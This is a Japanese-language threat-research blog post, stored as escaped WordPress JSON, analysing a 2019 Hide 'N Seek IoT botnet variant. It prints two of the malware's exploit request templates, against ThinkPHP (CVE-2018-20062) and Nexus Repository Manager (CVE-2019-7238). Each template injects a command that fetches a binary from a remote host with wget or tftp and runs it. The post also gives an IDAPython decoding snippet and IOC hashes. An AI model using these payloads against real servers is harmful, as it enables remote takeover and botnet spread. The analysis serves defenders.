Hide 'N Seek \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u304c\u6700\u521d\u306b\u767a\u898b\u3055\u308c\u305f<\/a>\u306e\u306f2018\u5e741\u6708\u3067\u3001\u30dc\u30c3\u30c8\u9593\u306e\u901a\u4fe1\u306b\u30d4\u30a2\u30c4\u30fc\u30d4\u30a2\u3092\u4f7f\u3046\u30e6\u30cb\u30fc\u30af\u306a\u901a\u4fe1\u65b9\u6cd5\u3067\u77e5\u3089\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n \u767a\u898b\u4ee5\u964d\u3001\u5f53\u8a72\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306b\u306f\u3001\u6c38\u7d9a\u6027\u306e\u8ffd\u52a0\u3001\u65b0\u305f\u306a\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u8ffd\u52a0\u3001Android Debug Bridge (ADB) \u3092\u4ecb\u3057\u305f Android \u30c7\u30d0\u30a4\u30b9\u306e\u30bf\u30fc\u30b2\u30c3\u30c8\u5316\u306a\u3069\u3001\u3044\u304f\u3064\u304b\u306e\u30a2\u30c3\u30d7\u30b0\u30ec\u30fc\u30c9\u304c\u884c\u308f\u308c\u3066\u304d\u307e\u3057\u305f\u3002<\/p>\n \u672c\u7a3f\u3067\u306f\u30012019\u5e742\u670821\u65e5\u306b\u6700\u521d\u306b\u78ba\u8a8d\u3055\u308c\u305f 2 \u3064\u306e\u65b0\u3057\u3044\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7d44\u307f\u8fbc\u3093\u3060\u30d5\u30a1\u30df\u30ea\u4e9c\u7a2e\u306b\u3064\u3044\u3066\u8a73\u3057\u304f\u8aac\u660e\u3057\u307e\u3059\u30021 \u3064\u76ee\u306f CVE-2018-20062<\/a> \u306e ThinkPHP \u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3092\u30bf\u30fc\u30b2\u30c3\u30c8\u306b\u3057\u305f\u3082\u306e\u30012 \u3064\u76ee\u306f CVE-2019-7238<\/a> \u306e\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c (RCE) \u306e\u8106\u5f31\u6027\u3067\u3001Sonatype\u306eNexus Repository Manager (NXRM) 3 \u306e\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3092\u30bf\u30fc\u30b2\u30c3\u30c8\u306b\u3057\u305f\u3082\u306e\u3067\u3059\u3002<\/p>\n ThinkPHP \u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u3059\u3067\u306b\u3044\u304f\u3064\u304b\u306e\u00a0Mirai \u4e9c\u7a2e<\/a>\u306b\u3088\u308a\u63a1\u7528\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u3059\u304c\u3001\u3053\u306e\u307b\u304b\u306b CVE-2019-7238 \u306e\u8106\u5f31\u6027\u304c\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u4e0a\u3067\u5b9f\u969b\u306b\u60aa\u7528\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308b\u306e\u306f DDG \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8<\/a>\u306e\u307f\u3067\u3059\u3002\u4ee5\u4e0b\u306b\u6982\u8aac\u3059\u308b\u79c1\u305f\u3061\u306e\u8abf\u67fb\u306f\u3001Hide 'N Seek \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u304c 2019 \u5e74 2 \u6708\u306e\u6642\u70b9\u3067\u3059\u3067\u306b\u5f53\u8a72\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7d44\u307f\u8fbc\u3093\u3060\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306f\u3001DDG\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u3088\u308b\u7d44\u307f\u8fbc\u307f\u3088\u308a\u3055\u3089\u306b\u524d\u306e\u3053\u3068\u3067\u3059\u3002<\/p>\n \u3053\u306e Hide 'N Seek \u30de\u30eb\u30a6\u30a7\u30a2\u306e\u6700\u65b0\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u306f\u3001\u305d\u308c\u307e\u3067\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306b\u4ed8\u968f\u3057\u3066\u3044\u305f\u6a5f\u80fd\u306e\u591a\u304f\u304c\u7d44\u307f\u8fbc\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u305f\u3068\u3048\u3070\u6c38\u7d9a\u6027\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u7d44\u307f\u8fbc\u307f<\/a>\u3001 ADB \u7d4c\u7531\u3067 Android \u7aef\u672b\u3092\u30bf\u30fc\u30b2\u30c3\u30c8\u306b\u3059\u308b\u3053\u3068\u306a\u3069\u3067\u3059\u3002<\/p>\n \u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u304c\u4ee5\u524d\u304b\u3089\u4f7f\u7528\u3057\u3066\u3044\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u52a0\u3048\u3001\u3053\u306e\u7279\u5b9a\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u306f\u6b21\u306e 2 \u3064\u306e\u65b0\u3057\u3044\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u4f7f\u7528\u3059\u308b\u70b9\u304c\u30e6\u30cb\u30fc\u30af\u3067\u3059\u3002<\/p>\n \u672c Hide 'N Seek \u4e9c\u7a2e\u306f\u6b21\u306e \u53e4\u3044<\/a>\u8106\u5f31\u6027\u3082\u60aa\u7528\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n \u3053\u308c\u3089 2 \u3064\u306e\u65b0\u3057\u3044\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u52a0\u3048\u3066\u3001\u672c\u4e9c\u7a2e\u306f XOR \u30ad\u30fc 0x87 \u3092\u6587\u5b57\u5217\u306e\u6697\u53f7\u5316\u306b\u4f7f\u7528\u3057\u307e\u3059\u3002\u3053\u306e XOR \u30ad\u30fc\u306f\u4ee5\u524d\u306b\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308b\u4e9c\u7a2e\u3068\u7570\u306a\u308b\u3082\u306e\u3067\u3059\u3002\u305f\u3060\u3057\u3001\u4f7f\u7528\u3055\u308c\u308b\u6697\u53f7\u5316\u65b9\u5f0f\u306f\u3001\u3053\u308c\u307e\u3067\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u305f\u3082\u306e\u3068\u540c\u3058\u3067\u3001\u30d0\u30a4\u30c8\u5358\u4f4d\u3067\u7d2f\u7a4d\u7684\u306b XOR \u6f14\u7b97\u3092\u5b9f\u884c\u3059\u308b\u3082\u306e\u3067\u3059\u3002\u3053\u306e\u3084\u308a\u304b\u305f\u306b\u3064\u3044\u3066\u306f\u3001\u6b21\u306e IDApython \u30b3\u30fc\u30c9\u30b9\u30cb\u30da\u30c3\u30c8\u3092\u78ba\u8a8d\u3059\u308b\u3068\u308f\u304b\u308a\u3084\u3059\u3044\u3067\u3057\u3087\u3046\u3002<\/p>\n \u4ee5\u524d\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u898b\u305f\u3088\u3046\u306b\u3001\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306f\u30d4\u30a2\u30c4\u30fc\u30d4\u30a2\u901a\u4fe1\u7528\u306b\u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30d4\u30a2\u306e\u30ea\u30b9\u30c8\u3092\u4fdd\u6301\u3057\u3066\u3044\u307e\u3059\u3002\u540c\u5909\u7a2e\u306e\u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30d4\u30a2\u306e\u30ea\u30b9\u30c8\u306f\u3001\u904e\u53bb\u306b\u898b\u3089\u308c\u305f\u30b5\u30f3\u30d7\u30eb\u306e\u3082\u306e\u3068\u306f\u7570\u306a\u3063\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u30b5\u30f3\u30d7\u30eb\u306e\u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30d4\u30a2IP\u3001\u30dd\u30fc\u30c8\u306e\u4e00\u89a7\u306f\u3001\u3053\u3061\u3089\u306e Github \u30da\u30fc\u30b8<\/a>\u306b\u3042\u308a\u307e\u3059\u3002<\/p>\n \u767a\u898b\u4ee5\u964d Hide `N Seek \u30d4\u30a2\u30c4\u30fc\u30d4\u30a2 Linux \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306f\u3001\u611f\u67d3\u5bfe\u8c61\u30c7\u30d0\u30a4\u30b9\u3092\u5897\u3084\u3059\u305f\u3081\u3001\u65b0\u3057\u3044\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u8907\u6570\u53d6\u308a\u5165\u308c\u308b\u65b9\u5411\u306b\u9032\u5316\u3057\u3066\u304d\u307e\u3057\u305f\u3002\u4eca\u56de\u65b0\u305f\u306b\u767a\u898b\u3055\u308c\u305f\u4e9c\u7a2e\u3067\u3082\u6700\u8fd1\u306e 2 \u3064\u306e\u8106\u5f31\u6027\u3092\u8ffd\u52a0\u3059\u308b\u3053\u3068\u3067\u5175\u529b\u3092\u5897\u5f37\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u7279\u7b46\u3059\u3079\u304d\u306f CVE-2019-7238 \u3092\u6a19\u7684\u3068\u3059\u308b\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u8ffd\u52a0\u3055\u308c\u3066\u3044\u308b\u70b9\u3067\u3057\u3087\u3046\u3002\u30b5\u30f3\u30d7\u30eb\u306e\u521d\u51fa\u65e5\u6642\u304b\u3089\u3059\u308b\u306b\u3001\u540c\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306f\u6700\u3082\u65e9\u3044\u6642\u671f\u306b\u5f53\u8a72\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u3066\u3044\u308b\u3082\u306e\u3060\u3068\u8a00\u3048\u305d\u3046\u3067\u3059\u3002<\/p>\n \u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u304a\u5ba2\u69d8\u306f\u3001\u6b21\u306e\u65b9\u6cd5\u3067\u3053\u306e\u8105\u5a01\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n \u540c\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306f\u3001\u6b21\u306e\u30bf\u30b0\u3092\u4f7f\u7528\u3057\u3066AutoFocus\u3067\u8ffd\u8de1\u3067\u304d\u307e\u3059: HideNSeek<\/a><\/p>\n \u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306f\u672c\u7a3f\u3067\u898b\u3064\u304b\u3063\u305f\u30d5\u30a1\u30a4\u30eb\u30b5\u30f3\u30d7\u30eb\u3084\u4fb5\u5bb3\u306e\u5146\u5019\u306a\u3069\u3092\u3075\u304f\u3080\u8abf\u67fb\u7d50\u679c\u3092Cyber Threat Alliance(CTA \u30b5\u30a4\u30d0\u30fc\u8105\u5a01\u30a2\u30e9\u30a4\u30a2\u30f3\u30b9)\u306e\u30e1\u30f3\u30d0\u30fc\u3068\u5171\u6709\u3057\u307e\u3057\u305f\u3002CTA \u306e\u30e1\u30f3\u30d0\u30fc\u306f\u3053\u306e\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u3092\u4f7f\u7528\u3057\u3066\u3001\u304a\u5ba2\u69d8\u306b\u4fdd\u8b77\u3092\u8fc5\u901f\u306b\u63d0\u4f9b\u3057\u3001\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u8005\u3092\u4f53\u7cfb\u7684\u306b\u963b\u5bb3\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002Cyber Threat Alliance\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001\u6b21\u306eWeb\u30b5\u30a4\u30c8\u3092\u3054\u89a7\u304f\u3060\u3055\u3044: www.cyberthreatalliance.org<\/a><\/p>\n 7e20c6cea88ade6a6c4a08ce48fe4ac2451069b7662a8dda4362a304b4854ec7<\/td>\n \u00a0\u88681 \u672c Hide 'N Seek \u4e9c\u7a2e\u306e\u30b5\u30f3\u30d7\u30eb\u306b\u95a2\u3059\u308b IOC<\/em><\/span><\/p>\n","protected":false},"excerpt":{"rendered":" \u6982\u8981 Hide 'N Seek \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u304c\u6700\u521d\u306b\u767a\u898b\u3055\u308c\u305f\u306e\u306f2018\u5e741\u6708\u3067\u3001\u30dc\u30c3\u30c8\u9593\u306e\u901a\u4fe1\u306b\u30d4\u30a2\u30c4\u30fc\u30d4\u30a2\u3092\u4f7f\u3046\u30e6\u30cb\u30fc\u30af\u306a\u901a\u4fe1\u65b9\u6cd5\u3067\u77e5\u3089\u308c\u3066\u3044\u307e\u3059\u3002 \u767a\u898b\u4ee5\u964d\u3001\u5f53\u8a72\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306b\u306f\u3001\u6c38\u7d9a\u6027\u306e\u8ffd\u52a0\u3001\u65b0\u305f\u306a\u30a8\u30af\u30b9<\/p>\n","protected":false},"author":63,"featured_media":100353,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4469,4428,4470],"tags":[6651,6653,6119,6655,4679,4553,6656],"product_categories":[4346,4442,4444],"coauthors":[887],"class_list":["post-102400","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerabilities","category-threat-research-ja","category-vulnerabilities-ja","tag-cve-2018-20062-ja","tag-cve-2019-7238-ja","tag-exploits-ja","tag-hidenseek-ja","tag-iot-ja","tag-linux-ja","tag-thinkphp","product_categories-advanced-threat-prevention","product_categories-advanced-threat-prevention-ja","product_categories-advanced-wildfire-ja"],"yoast_head":"\n\u6280\u8853\u7684\u5206\u6790<\/h2>\n
\n
POST \/service\/extdirect HTTP\/1.1\r\nHost: %J\r\nAccept: *\/*\r\nContent-Type: application\/json\r\nConnection: close\r\nContent-Length: %d\r\n{\"action\":\"coreui_Component\",\"method\":\"previewAssets\",\"data\":[{\"page\":1,\"start\":0,\"limit\":50,\"sort\":[{\"property\":\"name\",\"direction\":\"ASC\"}],\"filter\":[{\"property\":\"repositoryName\",\"value\":\"*\"},{\"property\":\"expression\",\"value\":\"233.class.forName(',27h,'java.lang.Runtime',27h,').getRuntime().exec(['flock','-w','0\u2032,'\/tmp\/l%N','sh','-c','(wget http:\/\/%J\/%T -O %N||\/bin\/busybox tftp -g -l %N -r %T %I)&&chmod 777 %N&&.\/%N a%J a%J',27h,'])\"},{\"property\":\"type\",\"value\":\"jexl\"}]}],\"type\":\"rpc\",\"tid\":8}\r\n<\/pre>\n\n
GET \/?s=\/index\/thinkapp\/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=(wget%20http:\/\/%J\/%T%20-O%20%N||\/bin\/busybox%20tftp%20-g%20-l%20%N%20-r%20%T%20%I);chmod%20777%20%N;.\/%N%20a%J%20a%J\r\nHTTP\/1.1\r\nHost: %J\r\n<\/pre>\n
\n
key=0x87\r\nfor addr in range(strstart, strend):\r\n originalbyte = GetOriginalByte(addr)\r\n decryptedbyte = originalbyte^(key&0xff)\r\n PatchByte(addr, decryptedbyte)\r\n key += decryptedbyte\r\n<\/pre>\n
\u7d50\u8ad6<\/h2>\n
\n
IOC<\/h2>\n
\n\n
\n \u521d\u51fa<\/strong><\/td>\n SHA256\u5024<\/strong><\/td>\n \u30bf\u30fc\u30b2\u30c3\u30c8\u30a2\u30fc\u30ad\u30c6\u30af\u30c1\u30e3<\/strong><\/td>\n<\/tr>\n \n 2019-02-21<\/td>\n 49495c9aa08d7859fec1f99f487560b59d8a8914811746181e4e7edbee85341f<\/td>\n x86 64-bit<\/td>\n<\/tr>\n \n 2019-02-21<\/td>\n d068e8f781879774f0bcc1f2a116211d41194b67024fe45966c8272a8038a7a1<\/td>\n ARM<\/td>\n<\/tr>\n \n 2019-03-15<\/td>\n 1583fd1c6607b77f51411c4ad7c9225324fd1b069645062a348cd885de0ac382<\/p>\n ARM<\/td>\n<\/tr>\n \n 2019-03-20<\/td>\n 0b05202f4da9bbe1af1811707a76544453282c4f3c0ac9b353759c86742f4369<\/td>\n MIPS big endian<\/td>\n<\/tr>\n \n 2019-03-22<\/td>\n 73df4e952c581afc427fa18fa2d0bcfa409c1814cd872a3ccf05d44f934ce780<\/td>\n MIPS little endian<\/td>\n<\/tr>\n \n 2019-05-24<\/td>\n c082c39e595c7f23c04ce0d6597657d6e649585d5da49b5bd896e664b712e60d<\/td>\n MIPS big endian<\/td>\n<\/tr>\n \n 2019-05-26<\/td>\n 500dd4c1a5c24495c3bb8173ce5c7b15ba3344aef855090b9b9585b2bfeea974<\/td>\n x86<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n